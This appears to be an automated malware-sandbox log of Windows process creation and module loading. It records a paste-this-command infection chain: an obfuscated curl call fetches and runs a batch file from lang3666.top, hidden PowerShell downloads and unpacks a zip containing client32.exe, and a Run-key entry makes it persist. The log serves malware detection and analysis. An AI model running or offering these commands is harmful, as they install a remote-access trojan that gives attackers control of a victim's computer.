Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=4212 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=3976 /prefetch:8
Source: unknown Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 ,
Source: unknown Process created: C:\Windows\System32\osk.exe "C:\Windows\system32\osk.exe"
Source: unknown Process created: C:\Windows\System32\osk.exe "C:\Windows\system32\osk.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Enter
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press Enter
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Application.zip', 'C:\Users\user\AppData\Roaming\Options')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Options\client32.exe "C:\Users\user\AppData\Roaming\Options\client32.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:3 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=4212 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=3976 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Enter Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press Enter Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Application.zip', 'C:\Users\user\AppData\Roaming\Options')" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Options\client32.exe "C:\Users\user\AppData\Roaming\Options\client32.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: osksupport.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: wmsgapi.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: mmdevapi.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: ksuser.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: avrt.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: audioses.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: midimap.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: twinapi.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: hid.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: mstextprediction.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: uiautomationcore.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: uiamanager.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: actxprxy.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: osksupport.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: osksupport.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: pcicl32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: pcichek.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: pcicapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: dbgcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: nsmtrace.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: nslsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: pcihooks.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: riched32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: pciinv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: fwpolicyiomgr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: fwpolicyiomgr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{29CE1D46-B481-4AA0-A08A-D3EBC8ACA402}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Roaming\Options\NSM.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe Window found: window name: SysTabControl32 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe File opened: C:\Windows\SysWOW64\riched32.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Options\msvcr100.dll Jump to behavior
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF011000.00000004.00000800.00020000.00000000.sdmp
